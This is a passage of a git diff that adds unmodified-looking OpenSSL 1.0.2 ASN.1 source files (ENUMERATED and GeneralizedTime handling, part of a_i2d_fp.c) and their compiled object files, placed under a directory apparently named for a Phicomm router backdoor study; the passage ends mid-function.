+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/bn.h>
+
+/*
+ * Code for ENUMERATED type: identical to INTEGER apart from a different tag.
+ * for comments on encoding see a_int.c
+ */
+
+int ASN1_ENUMERATED_set(ASN1_ENUMERATED *a, long v)
+{
+    int j, k;
+    unsigned int i;
+    unsigned char buf[sizeof(long) + 1];
+    long d;
+
+    a->type = V_ASN1_ENUMERATED;
+    if (a->length < (int)(sizeof(long) + 1)) {
+        if (a->data != NULL)
+            OPENSSL_free(a->data);
+        if ((a->data =
+             (unsigned char *)OPENSSL_malloc(sizeof(long) + 1)) != NULL)
+            memset((char *)a->data, 0, sizeof(long) + 1);
+    }
+    if (a->data == NULL) {
+        ASN1err(ASN1_F_ASN1_ENUMERATED_SET, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    d = v;
+    if (d < 0) {
+        d = -d;
+        a->type = V_ASN1_NEG_ENUMERATED;
+    }
+
+    for (i = 0; i < sizeof(long); i++) {
+        if (d == 0)
+            break;
+        buf[i] = (int)d & 0xff;
+        d >>= 8;
+    }
+    j = 0;
+    for (k = i - 1; k >= 0; k--)
+        a->data[j++] = buf[k];
+    a->length = j;
+    return (1);
+}
+
+long ASN1_ENUMERATED_get(ASN1_ENUMERATED *a)
+{
+    int neg = 0, i;
+    long r = 0;
+
+    if (a == NULL)
+        return (0L);
+    i = a->type;
+    if (i == V_ASN1_NEG_ENUMERATED)
+        neg = 1;
+    else if (i != V_ASN1_ENUMERATED)
+        return -1;
+
+    if (a->length > (int)sizeof(long)) {
+        /* hmm... a bit ugly */
+        return (0xffffffffL);
+    }
+    if (a->data == NULL)
+        return 0;
+
+    for (i = 0; i < a->length; i++) {
+        r <<= 8;
+        r |= (unsigned char)a->data[i];
+    }
+    if (neg)
+        r = -r;
+    return (r);
+}
+
+ASN1_ENUMERATED *BN_to_ASN1_ENUMERATED(BIGNUM *bn, ASN1_ENUMERATED *ai)
+{
+    ASN1_ENUMERATED *ret;
+    int len, j;
+
+    if (ai == NULL)
+        ret = M_ASN1_ENUMERATED_new();
+    else
+        ret = ai;
+    if (ret == NULL) {
+        ASN1err(ASN1_F_BN_TO_ASN1_ENUMERATED, ERR_R_NESTED_ASN1_ERROR);
+        goto err;
+    }
+    if (BN_is_negative(bn))
+        ret->type = V_ASN1_NEG_ENUMERATED;
+    else
+        ret->type = V_ASN1_ENUMERATED;
+    j = BN_num_bits(bn);
+    len = ((j == 0) ? 0 : ((j / 8) + 1));
+    if (ret->length < len + 4) {
+        unsigned char *new_data = OPENSSL_realloc(ret->data, len + 4);
+        if (!new_data) {
+            ASN1err(ASN1_F_BN_TO_ASN1_ENUMERATED, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        ret->data = new_data;
+    }
+
+    ret->length = BN_bn2bin(bn, ret->data);
+    return (ret);
+ err:
+    if (ret != ai)
+        M_ASN1_ENUMERATED_free(ret);
+    return (NULL);
+}
+
+BIGNUM *ASN1_ENUMERATED_to_BN(ASN1_ENUMERATED *ai, BIGNUM *bn)
+{
+    BIGNUM *ret;
+
+    if ((ret = BN_bin2bn(ai->data, ai->length, bn)) == NULL)
+        ASN1err(ASN1_F_ASN1_ENUMERATED_TO_BN, ASN1_R_BN_LIB);
+    else if (ai->type == V_ASN1_NEG_ENUMERATED)
+        BN_set_negative(ret, 1);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_enum.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_enum.o
new file mode 100644
index 0000000000000000000000000000000000000000..d8d8f9e336a8f03584d0e01b0686d97d7ade13c9
GIT binary patch
literal 3440
zcmb_dU2GIp6u$dYI}|!yMCc-D)>zFFWwO(PSWI+hyW71@)<U=2C{P@C%K#1S?z){-
zYJo~NB@Al~5Bgx@ix0l|=8K^umgPqai4TMa^o0at4CqSaC(4iDdd}><beQhG7*BHN
z-22_{+;i?Z_uiR|#JZgh2jSu%uafx@M+v#UXucmbyFnt7W^$|L>3ajz__LoHf78P6
z{vEXFe$EdBYJ}Uoa;fl|Fc)<<0Wi6R7AFNdRnZ%+;sVF}kTty?`zLU96QxF%K#fy$
zs+4~!BA4WI#}$~G%_6CpljKr4GlM2_i5frL`jQqV1frj(Q`g3u=DOTXumO7el3X%Q
z0;IPF50AK8Xr)9?J`iZ(j*!1HBY^RAUxf}`pvL*aor>-a9|;4gI04=-(ly`F%GvN?
z_lEM%#^Pg`4_b`1d3Vr`CFbVX7HHv&f7|xcm;;Ceb`~$b;XZf|{p-!NaJC|!E8J_+
z8_OGKaE;=IV-=9XKf>f1%mr-k0$Q!^ym(+~xaDhiD?NExpp{dxMWu3i>YVPPw|_KO
zR|b?sk8z(R`c@yE`YYdY0<+4J_AMstnQFo|0z7*JK4!uq@->t5>qmeng?()vN6fgg
zvJ@yaV4Oz8ZB9>>^d>VapWeP(DNS#7y)r=d#b|NAFr9VJd<M33dO3Wn4tosKq2E%W
zhYqU|b(VD>HU2OM<rUP32(*|Nz;lmLjmL<Ptuf>3w(ZKGQca<fpvFx+M}3%_Vuxwl
zW1PXQt*Uw&h5%;YfzSL|D6cp;VOBifJZl!pm@^Gy#^tTsl)=+URZHhbr6EG1U0oY}
z{()3Jt>=B6Qil{+D{sh~L-{~^Knko|Q-yJxZfG884bY;!1H?&42{9Kmlqaf+INpyF
z$6k+P)sjZxDEMy!d^MYMV>}VjbI2JMy#-fP3_5R!UPbgMqJV3M8SgEo*MWYM^?yO#
zEqbP%A<_GxD=hjBxx=Er&=3{_&N<N!fFgQBq9-H@exM#@c3YX<hgF|Ib5heM@EE10
z!cg7hMy1xItLBS<x!~D&)XHUM?@<g#E;F08@WzFp$*&!<i&!2bW{G#9S}g`xl#4uO
z8CAP2pdPpE%d8b(&qBl6*rgMIT6m-m-d_h#*1>atV>~<#ekKkvJcR`UG0z2Pypgry
z`Kk{7O&$FEI{2kJ_!Yo0&L~_66!W}+egLgjJdF@{Eu1{Omr|@NK$QMoS&j4#ydH@w
ziAY!-({!RnW1B)sOx@Jo-5*J)2_+PZsH7{tWpiSax-+L~yg!;88OaQhNIb4)^SY|#
za+w@a)iFIev_~D<y+_@d93ENVVi&jw^{RSCwK=ac`xEh=-l(dNXEimgy@ynIN7U4?
zKF0m#w5ns%p7G7NfSXFUr-suDoPxJdFRlfX?Wr{OV5{I@S5hB-S0m&lOezSzHTb`~
zkADo15P~3>c0BzYk0A(xd=VPQ@sUJ99M3w(?;;3-IM#*Z2if^Te3=FR!h&1ZIb*@`
zE#&K5W4Jxen-)I)M>u~OJ4g07eHMI$g}>f{w_5N)3%=5V@3-LA_&>4WPg?js=%e5?
zqnKlAe&=z1PX}!{zo#GDaDHEiG&Vk}CsUyHTvhMpy_`0Zlyq&cPNW@4JxQe0*cg#=
z85|&8mSiFgWkyG}G*HqRU6bI~wAMW5Y`iO-m$JD`R?F$*V2TTByWz4VN8xP!AL4^W
zu$1-}H3%5W=hmdbn3dg}!_O*cSnD7(s~ly&fDf3#Vwl7({{wg#`FV!h|2#k0{4)9i
z|1YvN|Es;s{I_!lOmqMCKNH_S*Fk0<u-X5{;(x)0b33kkn7xfgmfJVP2;7eIw?GF|
zZBLh%+50$=X`X)$<GX@u+U;Lv_QyDpX}kRh;I-=SVTpU2*<t+=;`Y4$wS1$=b>{yt
l3v3BsxQ5*x*Q}MQz3f1@+7f0PlBIR*vn>7zn74}E{$HAgKmh;%

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_gentm.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_gentm.c
new file mode 100644
index 0000000..fa76dca
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_gentm.c
@@ -0,0 +1,312 @@
+/* crypto/asn1/a_gentm.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * GENERALIZEDTIME implementation, written by Steve Henson. Based on UTCTIME
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include "cryptlib.h"
+#include "o_time.h"
+#include <openssl/asn1.h>
+#include "asn1_locl.h"
+
+#if 0
+
+int i2d_ASN1_GENERALIZEDTIME(ASN1_GENERALIZEDTIME *a, unsigned char **pp)
+{
+# ifdef CHARSET_EBCDIC
+    /* KLUDGE! We convert to ascii before writing DER */
+    int len;
+    char tmp[24];
+    ASN1_STRING tmpstr = *(ASN1_STRING *)a;
+
+    len = tmpstr.length;
+    ebcdic2ascii(tmp, tmpstr.data, (len >= sizeof tmp) ? sizeof tmp : len);
+    tmpstr.data = tmp;
+
+    a = (ASN1_GENERALIZEDTIME *)&tmpstr;
+# endif
+    return (i2d_ASN1_bytes((ASN1_STRING *)a, pp,
+                           V_ASN1_GENERALIZEDTIME, V_ASN1_UNIVERSAL));
+}
+
+ASN1_GENERALIZEDTIME *d2i_ASN1_GENERALIZEDTIME(ASN1_GENERALIZEDTIME **a,
+                                               unsigned char **pp,
+                                               long length)
+{
+    ASN1_GENERALIZEDTIME *ret = NULL;
+
+    ret =
+        (ASN1_GENERALIZEDTIME *)d2i_ASN1_bytes((ASN1_STRING **)a, pp, length,
+                                               V_ASN1_GENERALIZEDTIME,
+                                               V_ASN1_UNIVERSAL);
+    if (ret == NULL) {
+        ASN1err(ASN1_F_D2I_ASN1_GENERALIZEDTIME, ERR_R_NESTED_ASN1_ERROR);
+        return (NULL);
+    }
+# ifdef CHARSET_EBCDIC
+    ascii2ebcdic(ret->data, ret->data, ret->length);
+# endif
+    if (!ASN1_GENERALIZEDTIME_check(ret)) {
+        ASN1err(ASN1_F_D2I_ASN1_GENERALIZEDTIME, ASN1_R_INVALID_TIME_FORMAT);
+        goto err;
+    }
+
+    return (ret);
+ err:
+    if ((ret != NULL) && ((a == NULL) || (*a != ret)))
+        M_ASN1_GENERALIZEDTIME_free(ret);
+    return (NULL);
+}
+
+#endif
+
+int asn1_generalizedtime_to_tm(struct tm *tm, const ASN1_GENERALIZEDTIME *d)
+{
+    static const int min[9] = { 0, 0, 1, 1, 0, 0, 0, 0, 0 };
+    static const int max[9] = { 99, 99, 12, 31, 23, 59, 59, 12, 59 };
+    char *a;
+    int n, i, l, o;
+
+    if (d->type != V_ASN1_GENERALIZEDTIME)
+        return (0);
+    l = d->length;
+    a = (char *)d->data;
+    o = 0;
+    /*
+     * GENERALIZEDTIME is similar to UTCTIME except the year is represented
+     * as YYYY. This stuff treats everything as a two digit field so make
+     * first two fields 00 to 99
+     */
+    if (l < 13)
+        goto err;
+    for (i = 0; i < 7; i++) {
+        if ((i == 6) && ((a[o] == 'Z') || (a[o] == '+') || (a[o] == '-'))) {
+            i++;
+            if (tm)
+                tm->tm_sec = 0;
+            break;
+        }
+        if ((a[o] < '0') || (a[o] > '9'))
+            goto err;
+        n = a[o] - '0';
+        if (++o > l)
+            goto err;
+
+        if ((a[o] < '0') || (a[o] > '9'))
+            goto err;
+        n = (n * 10) + a[o] - '0';
+        if (++o > l)
+            goto err;
+
+        if ((n < min[i]) || (n > max[i]))
+            goto err;
+        if (tm) {
+            switch (i) {
+            case 0:
+                tm->tm_year = n * 100 - 1900;
+                break;
+            case 1:
+                tm->tm_year += n;
+                break;
+            case 2:
+                tm->tm_mon = n - 1;
+                break;
+            case 3:
+                tm->tm_mday = n;
+                break;
+            case 4:
+                tm->tm_hour = n;
+                break;
+            case 5:
+                tm->tm_min = n;
+                break;
+            case 6:
+                tm->tm_sec = n;
+                break;
+            }
+        }
+    }
+    /*
+     * Optional fractional seconds: decimal point followed by one or more
+     * digits.
+     */
+    if (a[o] == '.') {
+        if (++o > l)
+            goto err;
+        i = o;
+        while ((a[o] >= '0') && (a[o] <= '9') && (o <= l))
+            o++;
+        /* Must have at least one digit after decimal point */
+        if (i == o)
+            goto err;
+    }
+
+    if (a[o] == 'Z')
+        o++;
+    else if ((a[o] == '+') || (a[o] == '-')) {
+        int offsign = a[o] == '-' ? -1 : 1, offset = 0;
+        o++;
+        if (o + 4 > l)
+            goto err;
+        for (i = 7; i < 9; i++) {
+            if ((a[o] < '0') || (a[o] > '9'))
+                goto err;
+            n = a[o] - '0';
+            o++;
+            if ((a[o] < '0') || (a[o] > '9'))
+                goto err;
+            n = (n * 10) + a[o] - '0';
+            if ((n < min[i]) || (n > max[i]))
+                goto err;
+            if (tm) {
+                if (i == 7)
+                    offset = n * 3600;
+                else if (i == 8)
+                    offset += n * 60;
+            }
+            o++;
+        }
+        if (offset && !OPENSSL_gmtime_adj(tm, 0, offset * offsign))
+            return 0;
+    } else if (a[o]) {
+        /* Missing time zone information. */
+        goto err;
+    }
+    return (o == l);
+ err:
+    return (0);
+}
+
+int ASN1_GENERALIZEDTIME_check(const ASN1_GENERALIZEDTIME *d)
+{
+    return asn1_generalizedtime_to_tm(NULL, d);
+}
+
+int ASN1_GENERALIZEDTIME_set_string(ASN1_GENERALIZEDTIME *s, const char *str)
+{
+    ASN1_GENERALIZEDTIME t;
+
+    t.type = V_ASN1_GENERALIZEDTIME;
+    t.length = strlen(str);
+    t.data = (unsigned char *)str;
+    if (ASN1_GENERALIZEDTIME_check(&t)) {
+        if (s != NULL) {
+            if (!ASN1_STRING_set((ASN1_STRING *)s,
+                                 (unsigned char *)str, t.length))
+                return 0;
+            s->type = V_ASN1_GENERALIZEDTIME;
+        }
+        return (1);
+    } else
+        return (0);
+}
+
+ASN1_GENERALIZEDTIME *ASN1_GENERALIZEDTIME_set(ASN1_GENERALIZEDTIME *s,
+                                               time_t t)
+{
+    return ASN1_GENERALIZEDTIME_adj(s, t, 0, 0);
+}
+
+ASN1_GENERALIZEDTIME *ASN1_GENERALIZEDTIME_adj(ASN1_GENERALIZEDTIME *s,
+                                               time_t t, int offset_day,
+                                               long offset_sec)
+{
+    char *p;
+    struct tm *ts;
+    struct tm data;
+    size_t len = 20;
+
+    if (s == NULL)
+        s = M_ASN1_GENERALIZEDTIME_new();
+    if (s == NULL)
+        return (NULL);
+
+    ts = OPENSSL_gmtime(&t, &data);
+    if (ts == NULL)
+        return (NULL);
+
+    if (offset_day || offset_sec) {
+        if (!OPENSSL_gmtime_adj(ts, offset_day, offset_sec))
+            return NULL;
+    }
+
+    p = (char *)s->data;
+    if ((p == NULL) || ((size_t)s->length < len)) {
+        p = OPENSSL_malloc(len);
+        if (p == NULL) {
+            ASN1err(ASN1_F_ASN1_GENERALIZEDTIME_ADJ, ERR_R_MALLOC_FAILURE);
+            return (NULL);
+        }
+        if (s->data != NULL)
+            OPENSSL_free(s->data);
+        s->data = (unsigned char *)p;
+    }
+
+    BIO_snprintf(p, len, "%04d%02d%02d%02d%02d%02dZ", ts->tm_year + 1900,
+                 ts->tm_mon + 1, ts->tm_mday, ts->tm_hour, ts->tm_min,
+                 ts->tm_sec);
+    s->length = strlen(p);
+    s->type = V_ASN1_GENERALIZEDTIME;
+#ifdef CHARSET_EBCDIC_not
+    ebcdic2ascii(s->data, s->data, s->length);
+#endif
+    return (s);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_gentm.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_gentm.o
new file mode 100644
index 0000000000000000000000000000000000000000..5fc99d8624560cec5e8fccd571777b3d690832f4
GIT binary patch
literal 4568
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_i2d_fp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_i2d_fp.c
new file mode 100644
index 0000000..0f56cd4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_i2d_fp.c
@@ -0,0 +1,157 @@
+/* crypto/asn1/a_i2d_fp.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/asn1.h>
+
+#ifndef NO_OLD_ASN1
+
+# ifndef OPENSSL_NO_FP_API
+int ASN1_i2d_fp(i2d_of_void *i2d, FILE *out, void *x)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        ASN1err(ASN1_F_ASN1_I2D_FP, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, out, BIO_NOCLOSE);
+    ret = ASN1_i2d_bio(i2d, b, x);
+    BIO_free(b);
+    return (ret);
+}
+# endif
+
+int ASN1_i2d_bio(i2d_of_void *i2d, BIO *out, unsigned char *x)
+{
+    char *b;
+    unsigned char *p;
+    int i, j = 0, n, ret = 1;
+
+    n = i2d(x, NULL);
+    b = (char *)OPENSSL_malloc(n);
+    if (b == NULL) {
+        ASN1err(ASN1_F_ASN1_I2D_BIO, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+
+    p = (unsigned char *)b;
+    i2d(x, &p);
+
+    for (;;) {
